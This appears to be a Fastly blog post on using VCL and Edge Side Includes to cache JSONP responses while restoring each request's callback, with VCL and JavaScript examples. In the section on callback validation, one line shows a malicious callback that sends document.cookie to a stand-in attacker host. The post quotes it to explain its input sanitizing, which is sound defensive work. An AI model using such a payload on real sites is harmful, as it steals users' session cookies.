Using ESI, Part 2: Leveraging VCL and ESI to Use JSONP
In my last post about Edge Side Includes (ESI), I discussed how ESI can be used to mix and match cacheable content (such as the front page of an ecommerce site) with uncacheable content (such as a user’s shopping basket on the site). I also explained how you can use ESI to auto-generate dynamic information in data responses. In the example of the ecommerce site, ESI can add location-based information into a JSON (JavaScript Object Notation) response.
In this post, I’m going to discuss how you can leverage ESI and VCL (Varnish Configuration Language, the domain-specific language that powers Fastly’s edge scripting capabilities) to use JSON responses, even when they’re loaded from another site. This is useful in many cases, including various analytics and social sharing instances.
Basic JSONP
JSONP (“JSON with padding”) is a way for web pages to request data from a different domain. Usually this would be prohibited because, for security reasons, browsers enforce a same-origin policy. JSONP takes advantage of the fact that browsers do not enforce the same-origin policy on <script> tags, which is why you can load external JavaScript libraries such as jQuery:
<script src="//ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
At its core, the concept is very simple: you want an external service (for example, one that keeps track of “like” counts on an article or page) to be able to supply data to you. So, you include a script tag on your page that loads from that service (which I’ll call “likeservice.example.com”) and passes the name of a callback:
<script src="//likeservice.example.com/likes/?item=1234&callback=getCount"></script>
In the example above, likeservice then returns the JSON and, most importantly, wraps that JSON in a JavaScript call to the getCount function that you supplied as the callback.
getCount({"name": "Foo", "id": 1234, "count": 7});
Because this response is loaded as a script, the script gets executed and the getCount function on your page then gets called with the returned JSON. For example, you could make getCount pop up an alert with the information returned:
function getCount(info) {
  alert("The item " + info["name"] + " has a count of " + info["count"]);
}
In practice, though, the callback is more likely to generate some HTML on the fly or update a counter element somewhere on the page.
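To make the round trip concrete, here is a minimal sketch that simulates both sides in plain JavaScript (runnable in Node.js). The helpers buildJsonpResponse and runAsScript are hypothetical names invented for this illustration, not part of any real service; in a browser, the second step happens automatically when the script tag loads.

```javascript
// Hypothetical server-side helper: wrap a JSON payload in a call to the
// callback named in the request (the "padding" in JSONP).
function buildJsonpResponse(callbackName, payload) {
  return callbackName + "(" + JSON.stringify(payload) + ");";
}

// Stand-in for the browser executing a loaded <script>: evaluate the
// response text with the page's callbacks in scope.
function runAsScript(scriptText, callbacks) {
  const names = Object.keys(callbacks);
  const values = names.map((name) => callbacks[name]);
  new Function(...names, scriptText)(...values);
}

// The page's callback; it records a message instead of calling alert()
// so that the sketch also runs outside a browser.
const messages = [];
function getCount(info) {
  messages.push("The item " + info["name"] + " has a count of " + info["count"]);
}

const response = buildJsonpResponse("getCount", { name: "Foo", id: 1234, count: 7 });
runAsScript(response, { getCount });

console.log(response);    // getCount({"name":"Foo","id":1234,"count":7});
console.log(messages[0]); // The item Foo has a count of 7
```

Note that the service never needs to know what getCount does; it only echoes the name it was given, which is exactly why the name has to be validated later on.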
More Sophisticated Uses
That works fine if you want every item you fetch to do the same thing, but if you want each one to do a different thing, then you have to specify a different callback:
<script src="//likeservice.example.com/likes/?item=1234&callback=getCountABCD"></script>
This would then return:
getCountABCD({"name": "Foo", "id": 1234, "count": 7});
Even for the same item (in this example, item ‘1234’), the callback might be different for different pages — for example, if you want the end result to look different on the index page than on the detail page.
Unfortunately, this hurts cache-hit ratios. While the JSON data returned is the same in both cases (and should therefore be cacheable), the JSONP wrapper needs to change, which means that it’s not cacheable.
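The effect on the cache can be sketched in a few lines, assuming a cache that keys objects on the full URL including the query string. Both cacheKey and normalizedKey are hypothetical helpers for illustration only; a real cache key usually includes more than the URL.

```javascript
// Assumption: the cache keys responses on the full URL, query string included.
function cacheKey(url) {
  return url;
}

// Hypothetical normalization: swap whatever callback was requested for a
// fixed placeholder so that every variant maps to the same key.
function normalizedKey(url) {
  return url.replace(/([?&]callback=)[^&]*/, "$1PLACEHOLDER");
}

const indexPage = "/likes/?item=1234&callback=getCountABCD";
const detailPage = "/likes/?item=1234&callback=getCountWXYZ";

// Same item, same JSON, but two separate cache entries.
console.log(cacheKey(indexPage) === cacheKey(detailPage));           // false
// With the callback normalized away, both requests share one entry.
console.log(normalizedKey(indexPage) === normalizedKey(detailPage)); // true
```

The rest of this post applies the same idea, using an ESI tag as the placeholder so the real callback can be put back at delivery time.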
Solving the “Uncacheable” Problem With ESI
ESI is explicitly designed to mix cacheable and non-cacheable content. It can be used here to solve the uncacheable problem. It looks a little complicated, but the concept is actually quite simple.
First, catch the case where you’re adding the callback. In vcl_recv:
sub vcl_recv {
  ....
  unset req.http.callback;
  if (req.url ~ "[\?&]callback=") {
    # Replace the callback with our ESI template. The trailing \2 keeps
    # the separator so that parameters after the callback stay intact.
    set req.url = regsub(req.url,
      "([\?&])callback=[a-zA-Z_][\w\[\]\._]*(&|$)",
      {"\1callback=%3Cesi%3Ainclude%20src%3D%22%2Fesi%2Fjsonp-callback%22%2F%3E\2"});
    return(lookup);
  }
  ....
}
It’s a little hard to read because of the regular expressions and the URL encoding, but what you’ve done is change the URL from something like:
/likes/?item=1234&callback=getCountABCD
to a URL-encoded version of this URL:
/likes/?item=1234&callback=<esi:include src="/esi/jsonp-callback"/>
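If the encoding is hard to follow, the rewrite can be approximated in JavaScript. This is only a sketch of what the regsub call does, not Fastly's implementation; rewriteCallback is a hypothetical name, and the replacement keeps any trailing "&" so that later parameters stay separated.

```javascript
// The URL-encoded ESI tag used as the replacement value.
const ENCODED_ESI_TAG =
  "%3Cesi%3Ainclude%20src%3D%22%2Fesi%2Fjsonp-callback%22%2F%3E";

// Approximate the regsub() call with String.prototype.replace.
function rewriteCallback(url) {
  return url.replace(
    /([?&])callback=[a-zA-Z_][\w\[\]._]*(&|$)/,
    (match, prefix, suffix) => prefix + "callback=" + ENCODED_ESI_TAG + suffix
  );
}

const rewritten = rewriteCallback("/likes/?item=1234&callback=getCountABCD");

console.log(rewritten);
// /likes/?item=1234&callback=%3Cesi%3Ainclude%20src%3D%22%2Fesi%2Fjsonp-callback%22%2F%3E

console.log(decodeURIComponent(rewritten));
// /likes/?item=1234&callback=<esi:include src="/esi/jsonp-callback"/>
```

Decoding the rewritten URL shows the readable form, which is what the origin sees as the callback value once it parses the query string.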
Note how the regular expression that matches the callback is defined. It requires the callback to start with an uppercase or lowercase letter or an underscore (_), and the rest of the name to consist only of letters, numbers, underscores, periods (.), or square brackets ([ or ]). Restricting the callback to these characters keeps it to a plain JavaScript function reference and is meant to stop anyone from inserting nasty hacks, like sniffing cookies by setting the callback to something like:
$.get('https://evil.com/'+document.cookie);getCountABCD
Read “Sanitising JSONP Callback Identifiers For Security” and “Security Risks With JSONP” for more information.
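The same character rules can be tried out in JavaScript. The sketch below anchors the pattern at both ends so the whole value has to match; isSafeCallback is a hypothetical helper name, and this illustrates the rule rather than replacing the VCL check.

```javascript
// Same character rules as the VCL pattern: a letter or underscore first,
// then only word characters, periods, or square brackets.
const CALLBACK_PATTERN = /^[a-zA-Z_][\w\[\]._]*$/;

function isSafeCallback(name) {
  return CALLBACK_PATTERN.test(name);
}

console.log(isSafeCallback("getCountABCD"));         // true
console.log(isSafeCallback("_private.handlers[0]")); // true
console.log(
  isSafeCallback("$.get('https://evil.com/'+document.cookie);getCountABCD")
); // false
```

The malicious value fails on its very first character, and it would also fail on the parentheses, quotes, and semicolon that follow.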
The first time the URL gets called, it will be fetched from the origin server, which will dutifully return this JSONP:
<esi:include src="/esi/jsonp-callback"/>({"name": "Foo", "id": 1234, "count": 7});
Note that some web frameworks (Rack, for example) do server-side validation of callbacks passed to them. You may need to specifically allow this form of ESI callback.
From that point on, any subsequent calls to /likes/?item=1234 will return a cached copy of the same thing (until the TTL expires or the count for “item 1234” is purged explicitly).
So far, so good. You’ve normalized the JSONP in order to make it cacheable. But you still need to add that original callback back in.
To do that, first you need to turn on ESI processing for the response:
sub vcl_fetch {
  if (req.url ~ "[\?&]callback=") {
    esi;
    # let's only cache this for 300s
    set beresp.ttl = 300s;
  }
}
Then, catch that call to the JSONP callback:
sub vcl_recv {
  ....
  if (req.url == "/esi/jsonp-callback") {
    # Extract the name of the callback from the original url and store it.
    # The pattern accepts the same names as the rewrite rule and also
    # consumes any parameters that follow the callback.
    set req.http.callback = regsub(req.topurl,
      "^.*[\?&]callback=([a-zA-Z_][\w\[\]\._]*)(&.*)?$",
      "\1");
    # Create the synthetic response
    error 900 "JSONP ESI";
  }
  ....
}
Next, process that call as a synthetic response:
sub vcl_error {
  ....
  if (obj.status == 900) {
    set obj.status = 200;
    set obj.response = "OK";
    # We add an empty comment at the start in order to
    # protect against content sniffing attacks.
    # See https://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/
    synthetic "/**/ " urldecode(req.http.callback);
    return (deliver);
  }
  ....
}
This will return:
/**/ getCountABCD
That output replaces the ESI tag (the <esi:include src="/esi/jsonp-callback"/> bit) in the JSONP response.
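The extraction and the synthetic body can be approximated in JavaScript as follows. Both extractCallback and syntheticBody are hypothetical names for illustration. One deliberate difference from the VCL: this sketch returns null when no valid callback is found, whereas regsub returns its input unchanged when the pattern does not match.

```javascript
// Approximates the regsub() on req.topurl: pull the callback name out of
// the original URL, whether or not other parameters follow it.
function extractCallback(topUrl) {
  const match = /[?&]callback=([a-zA-Z_][\w\[\]._]*)(?:&|$)/.exec(topUrl);
  return match ? match[1] : null;
}

// Approximates the synthetic response body, including the empty comment
// that guards against content sniffing.
function syntheticBody(callbackName) {
  return "/**/ " + decodeURIComponent(callbackName);
}

const callbackName = extractCallback("/likes/?item=1234&callback=getCountABCD");

console.log(syntheticBody(callbackName));                          // /**/ getCountABCD
console.log(extractCallback("/likes/?callback=getCount&item=1234")); // getCount
console.log(extractCallback("/likes/?item=1234"));                   // null
```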
Wait, What Just Happened?
There’s quite a lot to take in here, so let’s go back and unpack what just happened.
First, you removed the callback:
/likes/?item=1234&callback=getCountABCD
and replaced it with an ESI call:
/likes/?item=1234&callback=<esi:include src="/esi/jsonp-callback"/>
Then, you fetched that URL, which returned some JSONP with the ESI tag in place of the callback:
<esi:include src="/esi/jsonp-callback"/>({"name": "Foo", "id": 1234, "count": 7});
Next, you processed and replaced the ESI call with some synthetic content, which you made to be the original callback. The net result is that the ESI call gets replaced, and you end up with:
/**/ getCountABCD({"name": "Foo", "id": 1234, "count": 7});
And yet, apart from the initial fetch for the count when there’s a cache miss, there are no calls back to origin — no matter what the callback is. So, you get all the flexibility you want, but still keep your cache hit ratio up.
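The whole flow, including its effect on origin traffic, can be simulated in a short JavaScript sketch. Everything here is an assumption made for illustration: the Map stands in for the edge cache, fetchFromOrigin is a made-up origin that echoes the callback value it receives, and handleRequest compresses the vcl_recv, vcl_fetch, and vcl_error steps into one function. TTLs and purging are left out.

```javascript
const ESI_TAG = '<esi:include src="/esi/jsonp-callback"/>';
const CALLBACK_RE = /([?&])callback=([a-zA-Z_][\w\[\]._]*)(&|$)/;

// Hypothetical origin: wraps the JSON in whatever callback value it is given.
let originFetches = 0;
function fetchFromOrigin(url) {
  originFetches += 1;
  const callback = new URL(url, "http://likeservice.example.com")
    .searchParams.get("callback");
  return callback + '({"name": "Foo", "id": 1234, "count": 7});';
}

// Stand-in for the edge cache: normalized URL -> cached JSONP template.
const cache = new Map();

function handleRequest(url) {
  const match = CALLBACK_RE.exec(url);
  if (!match) throw new Error("expected a valid callback parameter");
  const callbackName = match[2];

  // Step 1: normalize the URL so every callback shares one cache entry.
  const normalized = url.replace(
    CALLBACK_RE,
    (m, prefix, name, suffix) =>
      prefix + "callback=" + encodeURIComponent(ESI_TAG) + suffix
  );

  // Step 2: only a cache miss goes back to origin.
  if (!cache.has(normalized)) {
    cache.set(normalized, fetchFromOrigin(normalized));
  }

  // Step 3: expand the ESI tag with this request's callback.
  return cache.get(normalized).replace(ESI_TAG, () => "/**/ " + callbackName);
}

const first = handleRequest("/likes/?item=1234&callback=getCountABCD");
const second = handleRequest("/likes/?item=1234&callback=getCountWXYZ");

console.log(first);         // /**/ getCountABCD({"name": "Foo", "id": 1234, "count": 7});
console.log(second);        // /**/ getCountWXYZ({"name": "Foo", "id": 1234, "count": 7});
console.log(originFetches); // 1
```

Two requests with different callbacks produce two different responses, yet the simulated origin is only contacted once.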
In Summary
Web content comes in all shapes and sizes, which can make caching content increasingly complicated. But VCL is an incredibly powerful tool — it can tell which parts of your data are dynamic and which are relatively static. This means you can actually cache far more than you might have originally thought possible.
Putting It All Together
For the sake of clarity, let’s collect all the different parts together in a single VCL file. You can recreate this either by creating objects in Fastly’s app or by uploading this as a VCL file:
sub vcl_recv {
  unset req.http.callback;
  if (req.url ~ "[\?&]callback=") {
    # Replace the callback with our ESI template. The trailing \2 keeps
    # the separator so that parameters after the callback stay intact.
    set req.url = regsub(req.url,
      "([\?&])callback=[a-zA-Z_][\w\[\]\._]*(&|$)",
      {"\1callback=%3Cesi%3Ainclude%20src%3D%22%2Fesi%2Fjsonp-callback%22%2F%3E\2"});
    return(lookup);
  }
  if (req.url == "/esi/jsonp-callback") {
    # Extract the name of the callback from the original url and store it.
    # The pattern accepts the same names as the rewrite rule above and
    # also consumes any parameters that follow the callback.
    set req.http.callback = regsub(req.topurl,
      "^.*[\?&]callback=([a-zA-Z_][\w\[\]\._]*)(&.*)?$",
      "\1");
    # Create the synthetic response
    error 900 "JSONP ESI";
  }
  #FASTLY recv
}

sub vcl_fetch {
  if (req.url ~ "[\?&]callback=") {
    esi;
    # let's only cache this for 300s
    set beresp.ttl = 300s;
  }
  #FASTLY fetch
}

sub vcl_error {
  if (obj.status == 900) {
    set obj.status = 200;
    set obj.response = "OK";
    # We add an empty comment at the start in order to
    # protect against content sniffing attacks.
    # See https://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/
    synthetic "/**/ " urldecode(req.http.callback);
    return (deliver);
  }
  #FASTLY error
}